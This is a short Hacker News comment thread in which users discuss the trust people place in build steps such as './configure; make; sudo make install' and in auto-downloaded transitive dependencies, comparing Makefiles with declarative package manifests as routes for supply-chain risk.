Hacker News new | ask | show | jobs
by jasonpeacock 1189 days ago
Nothing new to see here...

Any of these steps could do the same to your system, and it's been the "standard" for 30+ years:

    ./configure
    make
    sudo make install
Or literally any other language/package manager that supports build scripts.
1 comments
speed_spread 1189 days ago
At least you had to unpack the source archive and install the dependencies yourself, which gave one time to appreciate just how much you depended on and how trusting you were. Nowadays the bad code can be in any one of your 300 auto-downloaded public unsigned dependencies. It feels light, easy and fun but it's actually powerful dark magic to summon the work of thousands of individuals into your pet project.
link
kalkin 1189 days ago
A makefile can run arbitrary shell commands.
link
speed_spread 1189 days ago
Sure. And the code you're compiling will also at some point be executed. So you're trusting the persons who wrote _that_ project. Also, if a Makefile looks like it's doing anything else than setting up the compile env and building you can be sure I'm interrupting it quickly to look at what it's doing.

OTOH a declarative build manifest with transitive dependencencies is like a self-replicating invite to an open house party inside your computer. It's only a matter of time before some _bad people show up_. (cue Beastie Boys' "Fight For Your Right to Party" )

link